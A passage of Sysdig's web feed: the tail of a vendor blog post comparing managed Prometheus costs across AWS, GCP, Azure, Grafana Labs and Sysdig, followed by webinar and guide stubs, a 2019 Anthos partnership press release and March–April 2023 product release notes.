AWS (10s) | $180.00 | $7,458.20 | - | - | - | - | $578.17 | $141.52 | $8,357.88
GCP (60s) | - | - | $5,377.28 | - | - | - | - | - | $5,377.28
GCP (30s) | - | - | $7,500.00 | $2,603.65 | - | - | - | - | $10,103.65
GCP (10s) | - | - | $7,500.00 | $19,810.96 | - | - | - | - | $27,310.96
Azure (60s) | - | - | - | - | $573.58 | - | $578.17 | - | $1,151.74
Azure (30s) | - | - | - | - | $1,147.15 | - | $578.17 | - | $1,725.32
Azure (10s) | - | - | - | - | $3,441.46 | - | $578.17 | - | $4,019.63
Grafana Labs (60s) | - | - | - | - | - | $6,563.47 | - | - | $6,563.47
Sysdig (10s) | - | - | - | - | - | $2,295.21 | - | - | $2,295.21

When comparing managed service for Prometheus costs, be aware of the costs by metric sampling interval. Sysdig's metric sampling interval is 10 seconds by default, while DIY Prometheus, GCP, and Grafana pull metrics every 60 seconds. Despite collecting 6x more data than some of its competitors, Sysdig is the cheapest option. There are no extra charges for storage or query samples processing with Sysdig. Bear in mind that these charges can dramatically increase your bill, and QSP is inherently hard to forecast, since it varies with how your users query the data.

Comparing all the managed service for Prometheus prices analyzed in this article under the 10-second metrics ingestion scope, you'll see a huge difference among vendors:

  • AWS: ~$8,357 / month
  • GCP: ~$27,310 / month
  • Azure: ~$4,019 / month
  • Grafana Labs: ~$6,563 / month
  • Sysdig: ~$2,295 / month

Azure is almost 2x more costly than Sysdig, AWS is almost 4x, and GCP is 12x more.

K8s multi-cluster use case

If you skipped the “K8s single cluster” use case, please take a look at the first paragraph of that section. It is key to understand how TS are generated and how volatile and dynamic the numbers can be for every use case.

This time, we'll analyze costs in a larger scenario. This architecture is made up of five K8s clusters with 50 nodes each:

  • Five Kubernetes clusters
  • 50 nodes per cluster

The total number of time series has been calculated under regular load, with no stress or high average load peaks. For the sake of simplicity, during the testing cycle we redeployed/scaled down/scaled up a few deployments to emulate a real application lifecycle. Following, you'll find the number of time series generated by this group of K8s clusters, by job:

  • kubernetes-apiservers: 368,565 TS
  • kubernetes-pods: 4,131,315 TS
  • kubernetes-nodes-cadvisor: 3,607,086 TS
  • kubernetes-service-endpoints (node exporter + KSM): 2,018,828 TS
  • kubernetes-nodes: 505,992 TS
  • kube-dns: 1,850 TS
  • etcd: 21,995 TS
  • prometheus: 5,340 TS
  • felix_metrics: 20,040 TS
  • kube_controller_metrics: 315 TS
  • Time series TOTAL: 10,681,326

In terms of query processing and user activity, let’s start with the following assumptions:

  • 50 different users accessing Prometheus with their own dashboards and graphs reporting data for their projects.
  • An average of eight graphs querying data per user.
  • The refresh interval for each graph is 10 seconds. Assuming an average of two hours per user per day, that corresponds to 720 queries per graph, or 5,760 queries per user per day across the eight graphs.
  • Data is being shown in a three hour timeframe on average.
  • The highest number of samples processed in this environment for three hours is 11,535,832,080.
  • We’ll assume 300,000 samples on average per query.
  • Monitoring query processing ~2,628,288,000,000 (1)
  • Alerting query processing ~26,280,000,000,000 (2)

(1) Monitoring query processing has been calculated from: 50 monitoring users * 5,760 queries per day and user * 30 days a month * 300,000 avg samples per query (3h).

(2) Alerting query processing has been calculated from: 2 executions per minute * 200 alerts per cluster * 60 minutes per hour * 730 hours per month * 300,000 avg samples per alerting rule.

Disclaimer: Following, you’ll find a quick calculation of the managed service for Prometheus costs for every vendor. Bear in mind that this is an approximation, and cost may fluctuate depending on the usage of your monitoring platform.

This time, we’ll go straight to the point and calculate the costs for each provider using the price per TS we got from the previous section.
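
As an illustration of that shortcut, here is a minimal Python sketch of the Sysdig column, assuming the same $30/node agent price and $5 per 1,000 TS rate from the single-cluster section; the other vendors follow the same pattern with their per-TS prices.

  # Sysdig multi-cluster cost: 5 clusters x 50 nodes, 10,681,326 total TS.
  nodes = 5 * 50
  total_ts = 10_681_326
  # Remove the cAdvisor, node exporter + KSM, and nodes jobs (free of charge):
  billable_ts = total_ts - 3_607_086 - 2_018_828 - 505_992  # 4,549,420 TS
  included_ts = 2_000 * nodes                               # 500,000 TS
  agent_cost = 30 * nodes                                   # $7,500 / month
  ingestion = (billable_ts - included_ts) * 5 / 1_000       # $20,247.10
  print(agent_cost + ingestion)                             # 27747.1 -> ~$27,747 / month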

Price comparison

Let's compare the 10-second metrics ingestion prices for every service.

TS calculator | AWS First ~44,800/22,400/7,500 TS | AWS Next ~5,600,358/2,800,179/933,393 TS | AWS over 252B samples | GCP First ~1,120,071/560,035/186,678 TS | GCP Next ~4,480,286/2,240,143/746,714 TS | GCP Next ~5,600,358/2,800,179/933,393 TS | GCP over 500B samples | Azure (any number of TS) | Grafana Labs & Sysdig | QSP | Disk | TOTAL
AWS (60s) | $180.00 | $8,750.00 | $3,597.03 | - | - | - | - | - | - | $2,890.83 | $1,882.28 | $17,300.13
AWS (30s) | $180.00 | $8,750.00 | $11,226.06 | - | - | - | - | - | - | $2,890.83 | $1,882.28 | $24,929.16
AWS (10s) | $180.00 | $8,750.00 | $41,742.18 | - | - | - | - | - | - | $2,890.83 | $1,882.28 | $55,445.29
GCP (60s) | - | - | - | $7,500.00 | $24,000.00 | $20,413.30 | $0.00 | - | - | - | - | $51,913.30
GCP (30s) | - | - | - | $7,500.00 | $24,000.00 | $22,500.00 | $27,217.73 | - | - | - | - | $81,217.73
GCP (10s) | - | - | - | $7,500.00 | $24,000.00 | $22,500.00 | $141,653.18 | - | - | - | - | $195,653.18
Azure (60s) | - | - | - | - | - | - | - | $7,629.03 | - | $2,890.83 | - | $10,519.86
Azure (30s) | - | - | - | - | - | - | - | $15,258.06 | - | $2,890.83 | - | $18,148.89
Azure (10s) | - | - | - | - | - | - | - | $45,774.18 | - | $2,890.83 | - | $48,665.01
Grafana Labs (60s) | - | - | - | - | - | - | - | - | $85,589.61 | - | - | $85,589.61
Sysdig (10s) | - | - | - | - | - | - | - | - | $27,747.10 | - | - | $27,747.10

In summary, these are the costs for every service when ingesting ~11 million time series with a 10-second interval.

  • AWS: ~$55,445/month
  • GCP: ~$195,653/month
  • Azure: ~$48,665/month
  • Grafana Labs: ~$85,589/month
  • Sysdig: ~$27,747/month

For a ~11 million time series volume, Sysdig's managed service for Prometheus is significantly cheaper than its competitors. GCP is almost 4x more expensive than AWS and Azure. Grafana Labs' cost also increased significantly, making it the second most expensive option. In comparison, Sysdig offers the most cost-effective solution.

Sysdig’s managed service for Prometheus benefits

Sysdig’s managed service for Prometheus stands out as the most affordable option on the market, with significant cost savings compared to other cloud providers such as GCP or AWS.

If you are an OSS Prometheus user looking to delegate your Prometheus metrics ingestion and management, you'll benefit from huge cost savings. Sysdig's managed service for Prometheus can help you reduce operation costs by taking care of metrics maintenance, scalability, storage, performance, and issue resolution.

If you are already processing and delegating your metrics to a managed Prometheus provider, keep in mind that you can still reduce your costs and even obtain more features for less. Query Samples Processed (QSP) charges can be particularly tricky to calculate, as they depend on many factors, such as the number of concurrent users, graphs, dashboards, refresh intervals, infrastructure size, etc.

Sysdig's agent ingestion interval is set to 10 seconds by default, whereas others opt for longer intervals of up to 60 seconds. Reducing this interval can negatively impact performance and reliability in some cases, resulting in a poor user experience. By choosing Sysdig's managed service for Prometheus, you can benefit from shorter metrics ingestion intervals without sacrificing performance, stability, and reliability, all at a lower price!

When it comes to querying and analyzing your historical data, performance is key. A managed service for Prometheus that can't return your data in a timely manner is not operational and can cause a lot of harm. Sysdig Monitor rolls up historical data over time, a key feature(1) that lets Sysdig Monitor process query samples much faster than its competitors.

Apart from including KSM, node exporter, and cAdvisor metrics free of charge, as well as all the metrics collected by Sysdig, including your own custom metrics and platform metrics, you can benefit from the metric enrichment Sysdig brings out of the box. With Sysdig, your Prometheus metrics gain cloud and Kubernetes context.

Sysdig is much more than a monitoring tool to ingest and store metrics and analyze your data. Metric enrichment, eBPF instrumentation, Sysdig Advisor for troubleshooting, Cost Advisor for reducing your K8s and cloud costs, and out-of-the-box dashboards, alerts, and integrations are some of the benefits that Sysdig Monitor brings. Check out this article and discover these features and much more!

(1) If you want to customize how Sysdig Monitor rolls up your data, please reach out to Sysdig support representatives.

Cut operational and infrastructure related costs

There are other costs associated with Prometheus monitoring worth mentioning. Prometheus metrics cost, the number of time series you manage, and QSP volume are not the only areas where you can save money. A managed service for Prometheus will take most of the burden off by ingesting and processing your Prometheus metrics automatically, and will make all your data available to you.

Businesses may struggle to maintain, scale, and support their Prometheus monitoring infrastructure. This task can be challenging and painful, especially when cardinality explosions come into play: time series start to grow exponentially, causing serious trouble with stability, scalability, and costs.

There's no need to worry anymore about whether your monitoring infrastructure is well sized, whether you can scale your environment up in a timely manner, or about that issue causing a big headache by preventing your organization from consuming its metrics. Relying on Sysdig Monitor to ingest, process, and manage your Prometheus metrics and your observability platform can help you dramatically reduce your operational and infrastructure costs.

In terms of Kubernetes and cloud costs, Sysdig can do much more to help you with cutting costs. Sysdig’s Cost Advisor is a tool included in Sysdig Monitor that helps you identify in which areas you are overspending. You can drill down through your whole infrastructure, get granular information, and finally reduce your wasted spending by rightsizing your workloads based on Sysdig’s recommendations. Do you want to learn more? Check how Cost Advisor can help you to reduce your wasted spending by 40% on average!

Conclusion

While the vendors analyzed in this article offer similar managed services for Prometheus, their associated costs may vary. Some vendors also charge for QSP and storage, which can increase your bill exponentially, making it difficult to limit and control costs since they are tied to usage. The more users query, inspect and monitor your data, the higher your bill will be.

Sysdig’s managed service for Prometheus is significantly cheaper than its competitors, even when ingesting metrics every 10 seconds. QSP and storage are included in the price, so there are no surprises when the bill arrives.

To learn more about how to reduce costs with Sysdig’s managed service for Prometheus, visit the Sysdig Monitor trial page and request a 30-day free account. You’ll be up and running in minutes!

The post How Much Does Your Managed Service for Prometheus Cost? appeared first on Sysdig.

]]>
Not your Parent’s Cloud Security: Real-time Cloud Threat Detection for GCP https://sysdig.com/resources/webinars/not-your-parents-cloud-security-real-time-cloud-threat-detection-for-gcp/ Tue, 25 Oct 2022 17:00:42 +0000 https://sysdig.com/?p=54182&post_type=sd-webinars&preview_id=54182 Not your Parent’s Cloud Security: Real-time Cloud Threat Detection for GCP

The post Not your Parent’s Cloud Security: Real-time Cloud Threat Detection for GCP appeared first on Sysdig.

]]>
The post Not your Parent’s Cloud Security: Real-time Cloud Threat Detection for GCP appeared first on Sysdig.

]]>
5 Steps to Securing GCP Cloud Infrastructure https://sysdig.com/resources/guides/5-steps-to-securing-gcp-cloud-infrastructure/ Fri, 24 Feb 2023 09:10:48 +0000 https://sysdig.com/?post_type=sd-guides&p=47295 Securing GCP Cloud Infrastructure

The post 5 Steps to Securing GCP Cloud Infrastructure appeared first on Sysdig.

]]>
The post 5 Steps to Securing GCP Cloud Infrastructure appeared first on Sysdig.

]]>
Sysdig Announces Availability of its Visibility and Security Platform for Google Cloud’s Anthos. https://sysdig.com/press-releases/google-clouds-anthos/ Tue, 09 Apr 2019 16:39:27 +0000 https://sysdig.com/?post_type=sd-press-releases&p=15385 […] Kubernetes visibility and security with Anthos as an early access partner and introduces cloud-native platform in GCP Marketplace. April 9, 2019.

The post Sysdig Announces Availability of its Visibility and Security Platform for Google Cloud’s Anthos. appeared first on Sysdig.

]]>
Sysdig supports multi-cloud Kubernetes security with Anthos as an early access partner; Company also introduces its cloud-native visibility and security platform in GCP Marketplace for all customers


SAN FRANCISCO, Google Cloud Next ‘19 — April 9, 2019 — Sysdig, Inc., a cloud-native visibility and security company, today announced at Google Cloud Next ‘19 support for Google Cloud’s Anthos as a launch partner. The company also announced that its commercial solutions, including its Visibility and Security Platform (VSP) 2.0 introduced today, along with the company’s open source project Falco, are now featured on the Google Cloud Platform (GCP) Marketplace. Enterprises considering adoption of a multi-cloud strategy based on Google Kubernetes Engine (GKE) and Anthos can now more easily benefit from Sysdig’s unified view of risk, health, and performance for their cloud-native environments. Enterprises now have the ability to easily get started with Sysdig on the GCP Marketplace to take advantage of the deep visibility and security Sysdig provides.

“Whether enterprises are running microservices in Google Cloud, the private cloud or both, Sysdig has unlocked the data needed to address the essential use cases of running Kubernetes in production. We do this while reducing the instrumentation tax that enterprises are used to paying for safety and security,” said Apurva Davé, chief marketing officer at Sysdig. “As enterprises continue to adopt cloud-native architectures, we give them the tools they need to consistently operate secure and reliable containers across clouds.”

Google Cloud’s Anthos + Sysdig
Anthos, a managed Kubernetes offering that runs inside a customer’s data center and in the public cloud of their choice, was first announced last year as GKE On-Prem and was made generally available today at Next ‘19. Anthos enables enterprises to run and manage workloads across multiple clusters, clouds, and hardware — including managing environments that mix public clouds and on-premises hardware. Anthos is a multi- and hybrid-cloud approach that provides enterprises with a unified, single pane of glass view for managing clusters and ensuring consistency across different environments.

As a launch partner for Google Cloud’s Anthos, Sysdig has collaborated closely with Google Cloud to test and validate this new approach and ensure a smooth deployment of Sysdig’s visibility, security, and forensics technologies across multiple environments.

“With Google Cloud’s Anthos, we enable organizations to transition to the cloud on their own terms and operate in the environments that work for them. To remain competitive and deliver reliable software, organizations need easy access to trusted, tested, and portable applications that can run across their entire infrastructure. Through our work with Sysdig, enterprises can simplify adoption of container-based infrastructure no matter what environment they operate in — on-premises or in the public cloud,” said Adam Glick, product marketing lead, modern infrastructure at Google.

Sysdig Visibility and Security Platform and Google Cloud’s Anthos User Benefits:
  • A consistent multi-cloud environment. The combination of Anthos and Sysdig gives enterprises the confidence to know that they can run secure, reliable cloud-native applications in a multi-cloud environment with the same tools, same processes, and the same levels of performance and protection.
  • More data, more collaboration equals faster time to production: By integrating Anthos with container visibility, compliance, and run-time security from Sysdig, DevOps can deploy faster, with lower risk. Sysdig provides enterprises with the first unified view of risk, health, and performance across their entire cloud-native infrastructure. This gives DevOps teams, security teams, and service owners access to more data and a single place to validate the operational status of the software and infrastructure that they manage, but at the massive scale that enterprises require.
  • Auto service discovery: As soon as the Sysdig agent is installed, it leverages GKE and other orchestrators to automatically profile and discover infrastructure, applications, containers, metrics, and events, meaning no plugins are needed to get started. Sysdig automatically ingests, consolidates, and enriches data with context from cloud services and other orchestration tools.
  • Faster incident resolution: Adaptive alerts provide proactive notification of anomalies, intrusions, and security violations. Through observing system calls, Sysdig provides deeper container visibility that can be used to detect, alert, and block suspicious activity before it impacts operations.
  • Simplified compliance: Sysdig automatically scans hosts, containers, and microservices for compliance based on Center for Internet Security (CIS) configurations or against custom benchmarks. This helps ease the pain of measuring and enforcing compliance.

Sysdig and Falco Join the GCP Marketplace
The GCP Marketplace gives enterprises a place to browse, compare, and deploy reliable and secure solutions that are compatible with their Google Cloud environments and production ready. Sysdig has joined the Kubernetes Applications section of the GCP Marketplace, which is focused on technologies that address the unique challenges of Kubernetes environments. By joining, Sysdig makes it easier for enterprises to compare the Sysdig platform to single-focus products — purely security, APM or monitoring tools — and realize the value of the combined Sysdig visibility, security, and forensics solutions. Enterprises can now install the Sysdig agent in their cluster directly from the GCP Marketplace, making it easier for them to get started.

Falco, the open source runtime security project from Sysdig, has also joined the GCP Marketplace. Falco continuously monitors containers, applications, hosts, and network activity, alerting on abnormal behavior. It was recently added as a Cloud Native Computing Foundation® Sandbox project.

What Sysdig and Google Partners are Saying:
Arctiq Inc. is a Toronto-based solution provider focused on helping clients modernize their approach to IT delivery. As a Sysdig partner and a Google Cloud Premier Partner, Arctiq has a proven track record delivering modern solutions at scale, faster, and more securely.

“We have had great success pairing Google Kubernetes Engine with Sysdig to help our clients get the visibility they need to successfully run container-based services. We’re glad to see the expanding Sysdig and Google Cloud partnership around the GCP Marketplace and Anthos. We expect these advances to make it even easier for our customers to work with the combined solutions,” said Mike Morrison, partner at Arctiq.

In a separate announcement today, Sysdig shared its vision for a data-first approach to reliable and secure cloud applications in a multi-cloud world. VSP 2.0 provides enterprises with the first and only unified view of the risk, health, and performance of their cloud-native environments.

Availability and pricing
Sysdig is available now to Anthos users, and both the Sysdig agent and Falco are available on GCP Marketplace.

Where to see Sysdig VSP in action
Please visit us at Next ‘19 at booth S1715 to learn more about the VSP 2.0. Also join us during our Cloud Field Day live stream presentation on Wednesday, April 10 from 2 – 3:30 p.m. PT.

Additional information

Media Contact

Amanda McKinney, 280blue, Inc.
amanda@280blue.com

The post Sysdig Announces Availability of its Visibility and Security Platform for Google Cloud’s Anthos. appeared first on Sysdig.

]]>
What’s New in Sysdig – March & April 2023 https://sysdig.com/blog/whats-new-in-sysdig-march-and-april-2023/ Thu, 27 Apr 2023 18:00:00 +0000 https://sysdig.com/?p=71236 […] Sysdig platform coverage to new environments by adding support for GCP metrics on Sysdig Monitor. Also, we extended our new […]

The post What’s New in Sysdig – March & April 2023 appeared first on Sysdig.

]]>
“What’s New in Sysdig” is back with the March and April 2023 edition! Happy International Women’s Day! Happy St. Patrick’s Day! Ramadan Mubarak! Happy Easter! And we hope you had an excellent Kubecon in Amsterdam! We are Gonzalo Rocamador, Enterprise Sales Engineer based in Spain, and Parthi Sriivasan, Sr. Customer Solution Architect, and we are excited to share with you the latest feature releases from Sysdig.

This month, Sysdig Secure’s Container Registry scanning functionality became generally available for all users. This functionality provides an added layer of security between the pipeline and runtime scanning stages. On Sysdig Monitor, we introduced a feature to automatically translate Metrics alerts in form-based query to PromQL. This allows you to choose between the convenience of form and the flexibility of PromQL.

We are excited to announce the availability of the Sysdig 6.0 on-premises release. This release brings to on-premises customers several product capabilities already available on the Sysdig SaaS platform, for both the Monitor and Secure products.

In March, we expanded Sysdig platform coverage to new environments by adding support for GCP metrics in Sysdig Monitor. We also extended our new security posture module to cover OpenShift platforms. Further, we introduced a new Inventory feature as a tech preview. This feature provides a consolidated view of all resources across Infrastructure as Code, containers, cloud, and hosts, along with their security posture and configuration.

Stay tuned for more updates from Sysdig and let’s get started!

Sysdig Monitor

GCP Metrics are Now Natively Supported by Sysdig Monitor

We are happy to announce the general availability of GCP metrics support in Sysdig Monitor. Just connect your Google Cloud account, enable the integration, and benefit from out-of-the-box GCP monitoring.

Initial support includes integrations for GCP MySQL, PostgreSQL, SQL Server, Compute Engine, and Memorystore for Redis. Customers can leverage out-of-the-box dashboards and alerts for these services. Additionally, metrics are collected for all GCP services, so if there isn't a set of dashboards/alerts for a service yet, it's simple to create them.

More information is available in the documentation and in our recent blog post: https://sysdig.com/blog/native-support-gcp-monitor/


How customers are using this:

Thanks to its multi-cloud integration model, Sysdig customers can easily monitor AWS, Azure, and GCP workloads and services from a single pane of glass.

Customers can now correlate their own applications, services, and Prometheus metrics with Kubernetes and cloud context, without any extra effort.

Forget about taking care of exporters or any other service to pull your GCP metrics. Everything is handled by Sysdig Monitor. The same way Sysdig Monitor works with third-party applications and services, it offers a completely smooth experience for GCP integration.

Translate Metrics Alerts to PromQL

Metric alerts configured in form-based query can now be automatically translated to PromQL. This allows users to choose between the convenience of form and the flexibility of PromQL. Translation to PromQL also allows users to define more complex and composite queries that are not possible with Form. For more information, see Translate to PromQL.

Monitoring Integrations

Added the following integrations:

  • k8s-cAdvisor
  • Microsoft IIS
  • Microsoft SQL Server Exporter
  • KNative (integration with jobs only)
  • Added the following:
    • Zone label to the GCP integrations
    • Security updates to the UBI image of exporters
    • New ports and certificate path to the Etcd default job

IBM Cloud Integrations

The IBM Cloud integrations add new, easy-to-use dashboards focused on relevant metrics, and include specific alerts for these integrations.

  • IBM Cloud PostgreSQL
  • IBM Cloud MongoDB

Dashboards and Alerts

Introduced the following improvements and changes to dashboards & alerts:

  • Improved the CoreDNS integration dashboard and alerts with latency metrics
  • Deprecated the Linux Memory Usage dashboard
  • Moved the Linux Host Integration dashboard to the Host Infrastructure category
  • Improved the Memory Usage dashboard for Linux VMs
  • Removed the AWS CloudWatch: DynamoDB Overview By Operation dashboard

For more information, see Integration Library.

Sysdig Secure

Container Registry Scanning is Generally Available

Sysdig Secure is excited to announce the general availability of the Image Registry Scanning functionality as part of our Vulnerability Management suite.


Get Hands-On! Do you want to practice the new Sysdig registry scanner in a real environment?

How customers are using this:

  • Registries are a fundamental stage in the life cycle of container images. This feature provides an added layer of security between the pipeline and runtime stages, allowing you to gain complete visibility into potential vulnerabilities before deploying to production.
  • Container registries accumulate large amounts of images from developers and sometimes from third-party vendors. Some of these images are obsolete or no longer suitable for runtime, and registry scanning provides the necessary security layer to avoid degradation of the security posture.
  • Once the container registry is instrumented and analyzed, users can generate registry reports to extract, forward, and post-process the vulnerability information.

Supported vendors:

  • AWS Elastic Container Registry (ECR) – Single Registry and Organizational
  • JFrog Artifactory – SaaS and On-Premises
  • Azure Container Registry (ACR) – Single Registry
  • IBM Container Registry (ICR)
  • Quay.io – SaaS
  • Harbor

Risk Scores Explanation Enhanced in CIEM

Understand a breakdown of your CIEM Risk Scores with Overview explanations.

How customers are using this:

  • Within the Posture tab, you’ll find different Identity and Access resources with Risk Scores.
  • Select an entity from the list in the table and a drawer appears providing a detailed breakdown of the entity’s risk score. This includes the specific attributes and permissions that have contributed to it. Learn more about how risk scores are calculated.

Git Scope for Zones

We have extended the flexibility of Zones for Posture to also support Git integrations and IaC (Infrastructure as Code) scanning.

How customers are using this:

With the introduction of Git scope for zones, users can include the new Git scope types as part of the zone definition and configure the policies that apply for that zone.


Inventory Released as Tech Preview

We are happy to announce that Inventory is available to all customers as a new top-level menu item.


How customers are using this:

Sysdig users can gain visibility into resources across the cloud (GCP, Azure, and AWS) and Kubernetes environments from a single view. With the current release of Inventory, Sysdig users can achieve goals such as:

  • View all resources across their cloud environment(s)
  • Protect all resources and mitigate blind spots
  • Know all current resources in their infrastructure that share properties
  • Know which resources belong to a business unit
  • Review posture violations for a resource and take action (remediate or handle risk)

Support for CIS Critical Security Controls v8

The CIS Critical Security Controls (CIS Controls) are a prioritized set of Safeguards to mitigate the most prevalent cyber-attacks against systems and networks. They are mapped to and referenced by multiple legal, regulatory, and policy frameworks. CIS Controls v8 (latest) has been enhanced to keep up with modern systems and software. Movement to cloud-based computing, virtualization, mobility, outsourcing, work-from-home, and changing attacker tactics prompted the update, which supports enterprise security as organizations move to both fully cloud and hybrid environments.

This policy, with 1,316 controls classified into 18 requirement groups, is now available as part of Sysdig’s posture offering.

Support for OWASP Kubernetes Top 10

The OWASP Kubernetes Top 10 is aimed at helping security practitioners, system administrators, and software developers prioritize risks around the Kubernetes ecosystem. The Top 10 is a prioritized list of these risks. This policy, containing 344 controls classified into 10 requirements, is now available in Secure.

More information about this policy can be found in OWASP Kubernetes Top 10.

Updated CIS AWS Foundations Benchmark to v1.5.0

We are happy to announce the update of the existing CIS Amazon Web Services Foundations Benchmark policy to its latest version at the time (v1.5.0). This new version includes a new resource type (EFS File System) for greater coverage, as well as new controls for the Amazon Elastic File System (EFS) and Amazon Relational Database Service (RDS) services. The total number of controls in this new update has been raised to 79.

Helm Chart 1.5.80+ and Cli-Scanner 1.3.6 Released

  • RELEASE suffix in Java packages leading to false negatives resolved
    Specific Java packages containing a .RELEASE suffix were not correctly matched against their existing vulnerabilities. For example,
    https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-web/1.2.2.RELEASE
    was not correctly parsed and matched against the relevant vulnerabilities. This case is particularly common for spring-boot libraries.
    This fix removes false negatives, uncovering real vulnerabilities that were present in those packages but not previously listed.
  • IMPROVEMENT: display full path for jar-in-jar libraries
    When a jar library is found inside another jar, Sysdig will display the absolute path and the relative path inside the jar, using a colon as separator:

Before: /SpringHelloWorld-0.0.1.jar

After: /SpringHelloWorld-0.0.1.jar:BOOT-INF/lib/spring-core-5.3.16.jar

See Vulnerabilities|Pipeline for details on downloading and running the cli-scanner.

Legacy Inline Scanner v 2.4.21 Released

  • Updated anchore to 0.8.1-57 (March 2023)
  • Support OCI manifest list: parse and scan images built with attestation storage
  • Vulnerability fixes for the following high-severity CVEs:
    • CVE-2022-41723
    • CVE-2022-47629
    • CVE-2023-24329
    • CVE-2023-25577

Posture now supports Red Hat OpenShift Container Platform (OCP4)

Sysdig is pleased to announce support for the OpenShift platform. The CIS Red Hat OpenShift Container Platform Benchmark policy is now available, with 181 controls (145 exclusive to OpenShift), using a new Cluster resource type, which is of paramount importance in OCP4 due to the nature of the platform.


Improved Search of Posture Controls

Our ~1,000 Posture Controls are now easier to find, by their Name, Description, Severity, Type, and Target platform or distribution, anywhere you are looking for them:

  • Filtering for controls in the Control library
  • Filtering in the Policies library, including while editing your custom policy

    We also added enhanced visibility of control targets by showing the supported platform and distributions on each control.

Support for Posture on OCP, IKS, and MKE

We have added Posture support for new Kubernetes distributions:

  • Support for Red Hat OpenShift Container Platform 4 (OCP4):
    • CIS Red Hat OpenShift Container Platform Benchmark policy
  • Support for IBM Cloud Kubernetes Service (IKS):
    • Sysdig IBM Cloud Kubernetes Service (IKS) Benchmark policy
  • Support for Mirantis Kubernetes Engine (MKE):
    • Sysdig Mirantis Kubernetes Engine (MKE) Benchmark policy

New Out-of-the-Box Security Posture Policies Released 

  • CIS Kubernetes V1.24 Benchmark

A new Posture policy has been released following the CIS Kubernetes V1.24 Benchmark. This policy provides prescriptive guidance for establishing a secure configuration posture for Kubernetes 1.24, and includes 13 new controls.

  • CIS Critical Security Controls v8

The CIS Critical Security Controls (CIS Controls) are a prioritized set of Safeguards to mitigate the most prevalent cyber-attacks against systems and networks. They are mapped to and referenced by multiple legal, regulatory, and policy frameworks. CIS Controls v8 (latest) has been enhanced to keep up with modern systems and software. The move to cloud-based computing, virtualization, mobility, outsourcing, work-from-home, and changing attacker tactics prompted the update, which supports an enterprise’s security as it moves to both fully cloud and hybrid environments.

This policy, with 1,316 controls classified into 18 requirement groups, is now available as part of Sysdig’s posture offering.

  • OWASP Kubernetes Top 10

The OWASP Kubernetes Top 10 is aimed at helping security practitioners, system administrators, and software developers prioritize risks around the Kubernetes ecosystem. The Top 10 is a prioritized list of these risks. This policy, containing 344 controls classified into 10 requirements, is now available in Secure.

  • CIS Amazon Web Services Foundations Benchmark v1.5.0 (latest)

We are happy to announce the update of the existing CIS Amazon Web Services Foundations Benchmark policy to its latest version at the time (v1.5.0). This new version includes a new resource type (EFS File System) for greater coverage, as well as new controls for the Amazon Elastic File System (EFS) and Amazon Relational Database Service (RDS) services. The total number of controls in this update has been raised to 79.

The New CSPM Experience is Now Available in All IBM Cloud Production Environments

Sysdig is pleased to announce the GA release of the new CSPM Compliance experience in all IBM Cloud production environments. Focus your compliance results on your most important environments and applications!

New features introduced:

  • A new compliance page is introduced, ordered by your Zones!
  • CSPM Zones Management
    • Define scopes for the resources you want to evaluate
    • Apply a policy to your zone to add it to the compliance page
  • 50+ Risk and Compliance Policies included

To get to know our path from detection to remediation, risk acceptance, zones management, installation, and migration guidelines, please review the documentation.

New Page for Privacy Settings

A new page has been added in Administration|Settings to adjust Privacy settings for Sysdig Secure.

New Filter and Grouping for Threat Detection Policies

This release enhances the Threat Detection policies by showing the policies in a grouped manner and the ability to filter by policy type.

Additionally, badges on the list now alert when rules have been added or updated in managed policies.

New Filter and Grouping for Rules Library

This release enhances the Threat Detection rules library by showing the rules in a grouped manner, as well as adding the ability to view only custom rules.

Cloud Account Compute Resource Usage Reporting

In this release, we have added Compute Resource usage reporting to the subscription page.

Sysdig Agents

Agent Updates

The latest Sysdig Agent release is v12.13.0. Below is a diff of updates since v12.11.0, which we covered in our February update.

Feature enhancements

Kernel Support

Supports kernel version v6.2.0 and above.

Version Upgrade for Library Benchmark

Library Benchmark has been updated from version 1.5.0 to 1.7.1.

Collect PodDisruptionBudget Metrics

Added support for collecting Kubernetes PodDisruptionBudget metrics.

Send Start and Ready Time for Pods

Added support for sending start time and ready time for a pod when configured. For more information, see Customize KSM Collection.

Optimize collecting runtime rules

The Falco rules optimizer has been enabled by default. This performs optimizations on the collection of runtime rules in conjunction with system call events to help reduce agent CPU usage.

Defect Fixes

Agent No Longer Fails When Customer ID Is Unspecified

Fixed a problem where an agent stuck in a restart loop due to a missing customer ID would fail to recognize when the configuration was subsequently updated to provide one.

Agent Retrieves JMX Metrics as Expected

Sysdig agent no longer generates heap dumps while fetching JMX metrics.

Podman containers running as unprivileged systemd services are detected correctly

Container image metadata is reported correctly with Podman 4.x

The following vulnerabilities have been fixed:

CVE-2022-40897 and CVE-2022-41723

Fix proxy connection

Fixed an issue where the proxy connection could fail when used in conjunction with the agent console.

Agentless Updates

v4.0.0 is still the latest release.

SDK, CLI, and Tools

Sysdig CLI

v0.7.14 is still the latest release. The instructions on how to use the tool and the release notes from previous versions are available at the following link:

https://sysdiglabs.github.io/sysdig-platform-cli/

Python SDK

v0.16.4 is still the latest release.

https://github.com/sysdiglabs/sysdig-sdk-python/releases/tag/v0.16.4

Terraform Provider

There is a new release v0.7.4.

Documentation: https://registry.terraform.io/providers/sysdiglabs/sysdig/latest/docs

GitHub link: https://github.com/sysdiglabs/terraform-provider-sysdig/releases/tag/v0.7.4

Terraform modules

  • AWS Sysdig Secure for Cloud has been updated to v0.10.8.
  • GCP Sysdig Secure for Cloud remains unchanged at v0.9.9.
  • Azure Sysdig Secure for Cloud has been updated to v0.9.5.

Note: Please check release notes for potential breaking changes.

Falco VSCode Extension

v0.1.0 is still the latest release.

https://github.com/sysdiglabs/vscode-falco/releases/tag/v0.1.0

Sysdig Cloud Connector

AWS Sysdig Secure for Cloud has been updated to v0.16.34.

Admission Controller

Sysdig Admission Controller remains unchanged at v3.9.16.

Documentation: https://docs.sysdig.com/en/docs/installation/admission-controller-installation/

Runtime Vulnerability Scanner

The new vuln-runtime-scanner has been updated to v1.4.10.

Documentation: https://docs.sysdig.com/en/docs/sysdig-secure/vulnerabilities/runtime

Sysdig CLI Scanner

Sysdig CLI Scanner has been updated to v1.3.8.

Documentation: https://docs.sysdig.com/en/docs/sysdig-secure/vulnerabilities/pipeline/

Sysdig Secure Online Scan for GitHub Actions

The latest release has been updated to v3.5.0.

https://github.com/marketplace/actions/sysdig-secure-inline-scan

Sysdig Secure Jenkins Plugin

Sysdig Secure Jenkins Plugin has been updated to v2.2.9.

https://plugins.jenkins.io/sysdig-secure/

Prometheus Integrations

Integrations:

